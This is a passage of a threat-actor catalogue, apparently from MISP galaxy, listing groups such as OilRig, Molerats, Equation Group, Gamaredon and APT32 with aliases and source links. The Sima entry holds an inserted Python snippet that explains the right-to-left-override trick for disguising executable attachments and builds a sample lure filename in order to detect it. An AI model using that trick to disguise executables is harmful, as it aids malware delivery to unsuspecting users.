  • similar: misp-galaxy:mitre-intrusion-set="Cleaver - G0003" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cutting Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Clever Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="OilRig - G0049" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Magic Hound - G0059" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Flying Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="APT34 - G0057" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Hazel Sandstorm" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-ics-groups="OilRig" with estimative-language:likelihood-probability="almost-certain"

Table 11845. Table References

Links

https://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability

https://unit42.paloaltonetworks.com/unit42-striking-oil-closer-look-adversary-infrastructure/

https://unit42.paloaltonetworks.com/unit42-introducing-the-adversary-playbook-first-up-oilrig/

https://unit42.paloaltonetworks.com/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/

https://unit42.paloaltonetworks.com/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/

https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/

https://unit42.paloaltonetworks.com/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/

https://unit42.paloaltonetworks.com/unit42-analyzing-oilrigs-ops-tempo-testing-weaponization-delivery/

https://unit42.paloaltonetworks.com/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/

https://unit42.paloaltonetworks.com/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/

https://unit42.paloaltonetworks.com/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/

https://unit42.paloaltonetworks.com/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/

https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/

https://pan-unit42.github.io/playbook_viewer/

https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html

https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html

https://www.gov.il/BlobFolder/reports/attack_il/he/CERT-IL-ALERT-W-120.pdf

https://www.forbes.com/sites/thomasbrewster/2017/02/15/oilrig-iran-hackers-cyberespionage-us-turkey-saudi-arabia/#56749aa2468a

https://raw.githubusercontent.com/pan-unit42/playbook_viewer/master/playbook_json/oilrig.json

https://www.cfr.org/interactive/cyber-operations/oilrig

https://www.cfr.org/interactive/cyber-operations/apt-34

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail

https://web.archive.org/web/20120818235442/https://www.symantec.com/connect/blogs/shamoon-attacks

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ad6f8259-2bb4-4f7f-b8e1-710b35a4cbed&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://www.clearskysec.com/oilrig/

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems/

https://attack.mitre.org/groups/G0049/

https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/

https://www.secureworks.com/research/threat-profiles/cobalt-gypsy

https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf

https://www.wired.com/story/apt-34-iranian-hackers-critical-infrastructure-companies/

https://unit42.paloaltonetworks.com/atoms/evasive-serpens/

https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government/

Volatile Cedar

Beginning in late 2012, a carefully orchestrated attack campaign we call Volatile Cedar has been targeting individuals, companies and institutions worldwide. This campaign, led by a persistent attacker group, has successfully penetrated a large number of targets using various attack techniques, and specifically, a custom-made malware implant codenamed Explosive.

The tag is: misp-galaxy:threat-actor="Volatile Cedar"

Volatile Cedar is also known as:

  • Lebanese Cedar

  • DeftTorero

Volatile Cedar has relationships with:

  • uses: misp-galaxy:tool="Explosive" with estimative-language:likelihood-probability="very-likely"

Table 11846. Table References

Links

https://blog.checkpoint.com/2015/03/31/volatilecedar/

https://blog.checkpoint.com/2015/06/09/new-data-volatile-cedar/

https://securelist.com/sinkholing-volatile-cedar-dga-infrastructure/69421/

https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf

https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/

Dancing Salome

Dancing Salome is the Kaspersky codename for an APT actor with a primary focus on ministries of foreign affairs, think tanks, and Ukraine. What makes Dancing Salome interesting and relevant is the attacker’s penchant for leveraging HackingTeam RCS implants compiled after the public breach.

The tag is: misp-galaxy:threat-actor="Dancing Salome"

Table 11847. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170728/Guerrero-Saade-Raiu-VB2017.pdf

TERBIUM

Microsoft Threat Intelligence identified similarities between this recent attack and previous 2012 attacks against tens of thousands of computers belonging to organizations in the energy sector. Microsoft Threat Intelligence refers to the activity group behind these attacks as TERBIUM, following our internal practice of assigning rogue actors chemical element names.

The tag is: misp-galaxy:threat-actor="TERBIUM"

TERBIUM has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="TERBIUM" with estimative-language:likelihood-probability="likely"

Table 11848. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2016/12/09/windows-10-protection-detection-and-response-against-recent-attacks/

Molerats

In October 2012, malware attacks against Israeli government targets grabbed media attention when officials temporarily cut off Internet access for the entire police force and banned the use of USB memory sticks. Security researchers subsequently linked these attacks to a broader, year-long campaign that targeted not just Israelis but Palestinians as well, and, as discovered later, even the U.S. and UK governments. Further research revealed a connection between these attacks and members of the so-called “Gaza Hackers Team.” We refer to this campaign as “Molerats.”

The tag is: misp-galaxy:threat-actor="Molerats"

Molerats is also known as:

  • Gaza Hackers Team

  • Gaza cybergang

  • Gaza Cybergang

  • Operation Molerats

  • Extreme Jackal

  • Moonlight

  • ALUMINUM SARATOGA

  • G0021

  • BLACKSTEM

Molerats has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Molerats - G0021" with estimative-language:likelihood-probability="likely"

Table 11849. Table References

Links

https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html

https://ti.360.net/blog/articles/suspected-molerats-new-attack-in-the-middle-east/

https://ti.360.net/blog/articles/suspected-molerats-new-attack-in-the-middle-east-en/

https://middle-east-online.com/en/cyber-war-gaza-hackers-deface-israel-fire-service-website

https://www.fireeye.com/blog/threat-research/2014/06/molerats-here-for-spring.html

https://pwc.blogs.com/cyber_security_updates/2015/04/attacks-against-israeli-palestinian-interests.html

https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks

https://securelist.com/gaza-cybergang-wheres-your-ir-team/72283/

https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf

https://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf

https://securelist.com/gaza-cybergang-updated-2017-activity/82765/

https://www.kaspersky.com/blog/gaza-cybergang/26363/

https://attack.mitre.org/groups/G0021/

https://www.secureworks.com/research/threat-profiles/aluminum-saratoga

https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf

PROMETHIUM

PROMETHIUM is an activity group that has been active as early as 2012. The group primarily uses Truvasys, a first-stage malware that has been in circulation for several years. Truvasys has been involved in several attack campaigns, where it has masqueraded as one of several common computer utilities, including WinUtils, TrueCrypt, WinRAR, or SanDisk. In each of the campaigns, the Truvasys malware evolved with additional features, which shows a close relationship between the activity groups behind the campaigns and the developers of the malware.

The tag is: misp-galaxy:threat-actor="PROMETHIUM"

PROMETHIUM is also known as:

  • StrongPity

  • G0056

PROMETHIUM has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="PROMETHIUM - G0056" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="PROMETHIUM" with estimative-language:likelihood-probability="likely"

Table 11850. Table References

Links

https://www.microsoft.com/security/blog/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/

https://www.virusbulletin.com/conference/vb2016/abstracts/last-minute-paper-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users

https://attack.mitre.org/groups/G0056/

NEODYMIUM

NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird. This backdoor’s characteristics closely match FinFisher, a government-grade commercial surveillance package. Data about Wingbird activity indicate that it is typically used to attack individual computers instead of networks.

The tag is: misp-galaxy:threat-actor="NEODYMIUM"

NEODYMIUM is also known as:

  • G0055

NEODYMIUM has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="NEODYMIUM - G0055" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="NEODYMIUM" with estimative-language:likelihood-probability="likely"

Table 11851. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/

https://attack.mitre.org/groups/G0055/

Packrat

A threat group that has been active for at least seven years has used malware, phishing and disinformation tactics to target activists, journalists, politicians and public figures in various Latin American countries. The threat actor, dubbed Packrat based on its preference for remote access Trojans (RATs) and because it has used the same infrastructure for several years, has been analyzed by Citizen Lab researchers John Scott-Railton, Morgan Marquis-Boire, and Claudio Guarnieri, and Cyphort researcher Marion Marschalek, best known for her extensive analysis of state-sponsored threats.

The tag is: misp-galaxy:threat-actor="Packrat"

Table 11852. Table References

Links

https://citizenlab.ca/2015/12/packrat-report/

Cadelle

Symantec telemetry identified Cadelle and Chafer activity dating from as far back as July 2014, however, it’s likely that activity began well before this date. Command-and-control (C&C) registrant information points to activity possibly as early as 2011, while executable compilation times suggest early 2012. Their attacks continue to the present day. Symantec estimates that each team is made up of between 5 and 10 people.

The tag is: misp-galaxy:threat-actor="Cadelle"

Table 11853. Table References

Links

https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets

PassCV

The PassCV group continues to be one of the most successful and active threat groups that leverage a wide array of stolen Authenticode-signing certificates. Snorre Fagerland of Blue Coat Systems first coined the term PassCV in a blog post. His post provides a good introduction to the group and covers some of the older infrastructure, stolen code-signing certificate reuse, and other connections associated with the PassCV malware. There are several clues alluding to the possibility that multiple groups may be utilizing the same stolen signing certificates, but at this time SPEAR believes the current attacks are more likely being perpetrated by a single group employing multiple publicly available Remote Administration Tools (RATs). The PassCV group has been operating with continued success and has already started to expand their malware repertoire into different off-the-shelf RATs and custom code. SPEAR identified eighteen previously undisclosed stolen Authenticode certificates. These certificates were originally issued to companies and individuals scattered across China, Taiwan, Korea, Europe, the United States and Russia. In this post we expand the usage of the term ‘PassCV’ to encompass the malware mentioned in the Blue Coat Systems report, as well as the APT group behind the larger C2 infrastructure and stolen Authenticode certificates. We’d like to share some of our findings as they pertain to the stolen certificates, command and control infrastructure, and some of the newer custom RATs they’ve begun development on.

The tag is: misp-galaxy:threat-actor="PassCV"

Table 11854. Table References

Links

https://threatvector.cylance.com/en_us/home/digitally-signed-malware-targeting-gaming-companies.html

Sath-ı Müdafaa

A Turkish hacking group, Sath-ı Müdafaa, is encouraging individuals to join its DDoS-for-Points platform, which awards points and prizes for carrying out distributed denial-of-service (DDoS) attacks against a list of predetermined targets. Their DDoS tool also contains a backdoor that compromises the participants themselves, so the group's overarching motivation and allegiance are not entirely clear.

The tag is: misp-galaxy:threat-actor="Sath-ı Müdafaa"

Aslan Neferler Tim

Turkish nationalist hacktivist group that has been active for roughly one year. According to DomainTools, the group’s site has been registered since December 2015, with an active Twitter account since January 2016. The group carries out distributed denial-of-service (DDoS) attacks and defacements against the sites of news organizations and governments perceived to be critical of Turkey’s policies or leadership, and purports to act in defense of Islam.

The tag is: misp-galaxy:threat-actor="Aslan Neferler Tim"

Aslan Neferler Tim is also known as:

  • Lion Soldiers Team

  • Phantom Turk

Ayyıldız Tim

Ayyıldız (Crescent and Star) Tim is a nationalist hacking group founded in 2002. It performs defacements and DDoS attacks against the websites of governments that it considers to be repressing Muslim minorities or engaged in Islamophobic policies.

The tag is: misp-galaxy:threat-actor="Ayyıldız Tim"

Ayyıldız Tim is also known as:

  • Crescent and Star

TurkHackTeam

Founded in 2004, Turkhackteam is one of Turkey’s oldest and most high-profile hacking collectives. According to a list compiled on Turkhackteam’s forum, the group has carried out almost 30 highly publicized hacking campaigns targeting foreign government and commercial websites, including websites of international corporations.

The tag is: misp-galaxy:threat-actor="TurkHackTeam"

TurkHackTeam is also known as:

  • Turk Hack Team

Equation Group

The Equation Group is a highly sophisticated threat actor described by its discoverers at Kaspersky Lab as one of the most sophisticated cyber attack groups in the world, operating alongside, but always from a position of superiority over, the creators of Stuxnet and Flame.

The tag is: misp-galaxy:threat-actor="Equation Group"

Equation Group is also known as:

  • Tilded Team

  • EQGRP

  • G0020

Equation Group has relationships with:

  • similar: misp-galaxy:threat-actor="Longhorn" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="EquationDrug" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:tool="DoubleFantasy" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:tool="TripleFantasy" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:tool="GrayFish" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:tool="Fanny" with estimative-language:likelihood-probability="very-likely"

  • uses: misp-galaxy:tool="EquationLaser" with estimative-language:likelihood-probability="very-likely"

Table 11855. Table References

Links

https://en.wikipedia.org/wiki/Equation_Group

https://www.cfr.org/interactive/cyber-operations/equation-group

https://arstechnica.com/information-technology/2015/02/how-omnipotent-hackers-tied-to-the-nsa-hid-for-14-years-and-were-found-at-last/

https://www.dropbox.com/s/buxkfotx1kei0ce/Whitepaper%20Shadow%20Broker%20-%20Equation%20Group%20Hack.pdf?dl=0

https://en.wikipedia.org/wiki/Stuxnet

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf

https://attack.mitre.org/groups/G0020/

Greenbug

Greenbug was discovered targeting a range of organizations in the Middle East including companies in the aviation, energy, government, investment, and education sectors.

The tag is: misp-galaxy:threat-actor="Greenbug"

Greenbug has relationships with:

  • similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

Table 11856. Table References

Links

https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon

https://unit42.paloaltonetworks.com/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/

https://threatpost.com/shamoon-collaborator-greenbug-adopts-new-communication-tool/125383/

https://www.clearskysec.com/greenbug/

Gamaredon Group

Unit 42 threat researchers have recently observed a threat group distributing new, custom-developed malware. We have labelled this threat group the Gamaredon Group, and our research shows that the Gamaredon Group has been active since at least 2013. In the past, the Gamaredon Group has relied heavily on off-the-shelf tools. Our new research shows the Gamaredon Group has made a shift to custom-developed malware. We believe this shift indicates the Gamaredon Group has improved its technical capabilities.

The tag is: misp-galaxy:threat-actor="Gamaredon Group"

Gamaredon Group is also known as:

  • ACTINIUM

  • DEV-0157

  • Blue Otso

  • BlueAlpha

  • G0047

  • IRON TILDEN

  • PRIMITIVE BEAR

  • Shuckworm

  • Trident Ursa

  • UAC-0010

  • Winterflounder

  • Aqua Blizzard

  • Actinium

Gamaredon Group has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Gamaredon Group - G0047" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Aqua Blizzard" with estimative-language:likelihood-probability="likely"

Table 11857. Table References

Links

http://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution

https://www.lookingglasscyber.com/wp-content/uploads/2015/08/Operation_Armageddon_Final.pdf

https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution

https://attack.mitre.org/groups/G0047

https://github.com/StrangerealIntel/CyberThreatIntel/tree/master/Russia/APT/Gamaredon

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine

https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations

https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game

https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021

https://go.recordedfuture.com/hubfs/reports/cta-2019-1212.pdf

https://unit42.paloaltonetworks.com/atoms/tridentursa

https://cert.gov.ua/article/1229152

https://cert.gov.ua/article/971405

https://cert.gov.ua/article/40240

https://cert.gov.ua/article/39386

https://cert.gov.ua/article/39086

https://cert.gov.ua/article/39138

https://cert.gov.ua/article/18365

Infy

Infy is a group of suspected Iranian origin. Since early 2013, we have observed activity from a unique threat actor group, which we began to investigate based on increased activity against human rights activists at the beginning of 2015. In line with other research on the campaign, released prior to publication of this document, we have adopted the name “Infy”, which is based on labels used in the infrastructure and its two families of malware agents. Thanks to information we have been able to collect during the course of our research, such as characteristics of the group’s malware and development cycle, our research strongly supports the claim that the Infy group is of Iranian origin and potentially connected to the Iranian state. Amongst a backdrop of other incidents, Infy became one of the most frequently observed agents in attempted malware attacks against Iranian civil society beginning in late 2014, growing in use up to the February 2016 parliamentary election in Iran. After the conclusion of the parliamentary election, the rate of attempted intrusions and new compromises through the Infy agent slowed, but did not end. The trends witnessed in reports from recipients are reinforced through telemetry provided by design failures in more recent versions of the Infy malware.

The tag is: misp-galaxy:threat-actor="Infy"

Infy is also known as:

  • Operation Mermaid

  • Prince of Persia

  • Foudre

Table 11858. Table References

Links

https://www.intezer.com/prince-of-persia-the-sands-of-foudre/

https://www.freebuf.com/articles/network/105726.html

https://www.blackhat.com/docs/us-16/materials/us-16-Guarnieri-Iran-And-The-Soft-War-For-Internet-Dominance-wp.pdf

https://iranthreats.github.io/

http://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/

http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/

https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/

https://www.cfr.org/interactive/cyber-operations/prince-persia

https://unit42.paloaltonetworks.com/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/

https://unit42.paloaltonetworks.com/unit42-prince-persia-ride-lightning-infy-returns-foudre/

Sima

Sima is a group of suspected Iranian origin targeting Iranians in the diaspora. In February 2016, Iran-focused individuals received messages purporting to be from Human Rights Watch’s (HRW) Emergencies Director, requesting that they read an article about Iran pressing Afghan refugees to fight in Syria. While referencing a real report published by HRW, the links provided for the Director’s biography and article directed the recipient to malware hosted elsewhere. These spear-phishing attempts represent an evolution of Iranian actors in their social engineering tactics and narrow targeting. Although the messages still had minor grammatical and stylistic errors that would be obvious to a native speaker, the actors demonstrated stronger English-language proficiency than past intrusion sets and a deeper investment in background research prior to the attempt. The actors appropriated a real identity that would be expected to interact professionally with the subject, then offered validation through links to their biography and social media, the former of which was itself malware as well. The bait documents contained a real article relevant to the target’s interests and the topic referenced, and the message attempted to address how it aligned with their professional research or field of employment. The documents sent were malware binaries posing as legitimate files, using the common right-to-left filename tactic to conceal the actual file extension. All of these techniques, while common pretexting mechanisms, are a refinement compared to the tendency amongst other groups to simply keep sending different forms of generic malware or phishing in the hope that one would eventually succeed.
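The right-to-left filename trick above relies on the Unicode RIGHT-TO-LEFT OVERRIDE (U+202E): everything after it is rendered reversed, so the raw name `Report<U+202E>cod.exe` is shown to the user as `Reportexe.doc` while the operating system still sees a `.exe`. The following is an added example, not code from the Sima report or from MISP, of a check that a mail gateway or triage script can run on attachment names: it lists the bidi control characters present, reconstructs the displayed name, and compares the displayed extension with the real one. The filename is constructed; the rendering model is a deliberate simplification (one override, no terminating PDF), which is the form the trick takes.

```python
import unicodedata

RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE, the character behind the extension-hiding trick

# Bidirectional formatting characters that have no place in a filename shown to users.
BIDI_CONTROLS = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",  # LRE, RLE, PDF, LRO, RLO
    "\u2066", "\u2067", "\u2068", "\u2069",            # LRI, RLI, FSI, PDI
    "\u200e", "\u200f",                                # LRM, RLM
}

def displayed_name(name: str) -> str:
    """Approximate what a file manager renders: text after an RLO appears reversed.
    Simplification: a single RLO with no closing PDF, as used in the trick."""
    if RLO not in name:
        return name
    head, _, tail = name.partition(RLO)
    return head + tail[::-1]

def real_extension(name: str) -> str:
    """Extension the OS actually uses: after the last dot in the raw code points,
    ignoring bidi controls (which do not affect how the OS splits the name)."""
    cleaned = "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    return cleaned.rsplit(".", 1)[-1].lower() if "." in cleaned else ""

def check_filename(name: str) -> dict:
    """Report bidi controls, the name as displayed, and whether the displayed
    extension disagrees with the real one."""
    found = sorted({unicodedata.name(ch) for ch in name if ch in BIDI_CONTROLS})
    shown = displayed_name(name)
    shown_ext = shown.rsplit(".", 1)[-1].lower() if "." in shown else ""
    real = real_extension(name)
    return {
        "bidi_controls": found,
        "displayed": shown,
        "displayed_ext": shown_ext,
        "real_ext": real,
        # flag only when a control character changes the apparent extension,
        # so genuine RTL-language filenames carrying an RLM are not rejected
        "suspicious": bool(found) and shown_ext != real,
    }

if __name__ == "__main__":
    # Constructed attachment name in the style of the lure described above.
    lure = "HRW_Iran_Report" + RLO + "cod.exe"
    for n in (lure, "HRW_Iran_Report.docx"):
        print(repr(n), "->", check_filename(n))
```

The check is deliberately narrow: it does not reject every filename containing a bidi control, only those where the control changes the extension a user would see. A gateway policy that strips or rejects U+202E outright is simpler and also defensible, since there is no legitimate reason for an attachment name to contain an override.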

The tag is: misp-galaxy:threat-actor="Sima"

Table 11859. Table References

Links

https://www.blackhat.com/docs/us-16/materials/us-16-Guarnieri-Iran-And-The-Soft-War-For-Internet-Dominance-wp.pdf

https://iranthreats.github.io/

Blue Termite

Blue Termite is a group of suspected Chinese origin active in Japan.

The tag is: misp-galaxy:threat-actor="Blue Termite"

Blue Termite is also known as:

  • Cloudy Omega

  • Emdivi

Table 11860. Table References

Links

https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/

https://www.cfr.org/interactive/cyber-operations/blue-termite

Groundbait

Groundbait is a group targeting anti-government separatists in the self-declared Donetsk and Luhansk People’s Republics.

The tag is: misp-galaxy:threat-actor="Groundbait"

Table 11861. Table References

Links

http://www.welivesecurity.com/2016/05/18/groundbait

Longhorn

Longhorn has been active since at least 2011. It has used a range of backdoor Trojans in addition to zero-day vulnerabilities to compromise its targets. Longhorn has infiltrated governments and internationally operating organizations, in addition to targets in the financial, telecoms, energy, aerospace, information technology, education, and natural resources sectors. All of the organizations targeted would be of interest to a nation-state attacker. Longhorn has infected 40 targets in at least 16 countries across the Middle East, Europe, Asia, and Africa. On one occasion a computer in the United States was compromised but, following infection, an uninstaller was launched within hours, which may indicate this victim was infected unintentionally. According to the CFR, this threat actor compromises governments, international organizations, academic institutions, and financial, telecommunications, energy, aerospace, information technology, and natural resource industries for espionage purposes. Some of the tools used by this threat actor were released by WikiLeaks under the name "Vault 7."

The tag is: misp-galaxy:threat-actor="Longhorn"

Longhorn is also known as:

  • Lamberts

  • the Lamberts

  • APT-C-39

  • PLATINUM TERMINAL

Longhorn has relationships with:

  • similar: misp-galaxy:threat-actor="Equation Group" with estimative-language:likelihood-probability="likely"

Table 11862. Table References

Links

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7ca2e331-2209-46a8-9e60-4cb83f9602de&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://www.bleepingcomputer.com/news/security/longhorn-cyber-espionage-group-is-actually-the-cia/

https://www.cfr.org/interactive/cyber-operations/longhorn

http://blogs.360.cn/post/APT-C-39_CIA_EN.html

https://www.secureworks.com/research/threat-profiles/platinum-terminal

Callisto

The Callisto Group is an advanced threat actor whose known targets include military personnel, government officials, think tanks, and journalists in Europe and the South Caucasus. Their primary interest appears to be gathering intelligence related to foreign and security policy in the Eastern Europe and South Caucasus regions.

The tag is: misp-galaxy:threat-actor="Callisto"

Callisto is also known as:

  • COLDRIVER

  • SEABORGIUM

  • TA446

  • GOSSAMER BEAR

  • BlueCharlie

  • Star Blizzard

Callisto has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Star Blizzard" with estimative-language:likelihood-probability="likely"

Table 11863. Table References

Links

https://web.archive.org/web/20170417102235/https://www.f-secure.com/documents/996508/1030745/callisto-group

https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe

https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe

https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag

https://www.microsoft.com/security/blog/2022/08/15/disrupting-seaborgiums-ongoing-phishing-operations

https://blog.sekoia.io/calisto-continues-its-credential-harvesting-campaign

https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf

https://www.darkreading.com/attacks-breaches/russian-apt-bluecharlie-swaps-infrastructure-to-evade-detection

https://www.microsoft.com/en-us/security/blog/2023/12/07/star-blizzard-increases-sophistication-and-evasion-in-ongoing-attacks/

APT32

Cyber espionage actors, now designated by FireEye as APT32 (OceanLotus Group), are carrying out intrusions into private sector companies across multiple industries and have also targeted foreign governments, dissidents, and journalists. FireEye assesses that APT32 leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests.

The tag is: misp-galaxy:threat-actor="APT32"

APT32 is also known as:

  • OceanLotus Group

  • Ocean Lotus

  • OceanLotus

  • Cobalt Kitty

  • APT-C-00

  • SeaLotus

  • Sea Lotus

  • APT-32

  • APT 32

  • Ocean Buffalo

  • POND LOACH

  • TIN WOODLAWN

  • BISMUTH

  • ATK17

  • G0050

  • Canvas Cyclone

APT32 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT32 - G0050" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Canvas Cyclone" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="海莲花 - APT-C-00" with estimative-language:likelihood-probability="likely"

Table 11864. Table References

Links

https://attack.mitre.org/groups/G0050/

https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html

https://www.cybereason.com/labs-operation-cobalt-kitty-a-large-scale-apt-in-asia-carried-out-by-the-oceanlotus-group/

https://www.scmagazineuk.com/ocean-lotus-groupapt-32-identified-as-vietnamese-apt-group/article/663565/

https://www.brighttalk.com/webcast/10703/261205

https://github.com/eset/malware-research/tree/master/oceanlotus

https://www.cfr.org/interactive/cyber-operations/ocean-lotus

https://www.accenture.com/us-en/blogs/blogs-pond-loach-delivers-badcake-malware

https://www.secureworks.com/research/threat-profiles/tin-woodlawn

https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/

https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html

https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them

https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam

SilverTerrier

As these tools rise and fall in popularity (and more importantly, as detection rates by antivirus vendors improve), SilverTerrier actors have consistently adopted new malware families and shifted to the latest packing tools available.

The tag is: misp-galaxy:threat-actor="SilverTerrier"

Table 11865. Table References

Links

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/silverterrier-next-evolution-in-nigerian-cybercrime.pdf

WildNeutron

A corporate espionage group has compromised a string of major corporations over the past three years in order to steal confidential information and intellectual property. The gang, which Symantec calls Butterfly, is not state-sponsored but rather financially motivated. It has attacked multi-billion dollar companies operating in the internet, IT software, pharmaceutical, and commodities sectors. Twitter, Facebook, Apple, and Microsoft are among the companies who have publicly acknowledged attacks. Butterfly is technically proficient and well resourced. The group has developed a suite of custom malware tools capable of attacking both Windows and Apple computers, and appears to have used at least one zero-day vulnerability in its attacks. It keeps a low profile and maintains good operational security. After successfully compromising a target organization, it cleans up after itself before moving on to its next target. This group operates at a much higher level than the average cybercrime gang. It is not interested in stealing credit card details or customer databases and is instead focused on high-level corporate information. Butterfly may be selling this information to the highest bidder or may be operating as hackers for hire. Stolen information could also be used for insider-trading purposes.

The tag is: misp-galaxy:threat-actor="WildNeutron"

WildNeutron is also known as:

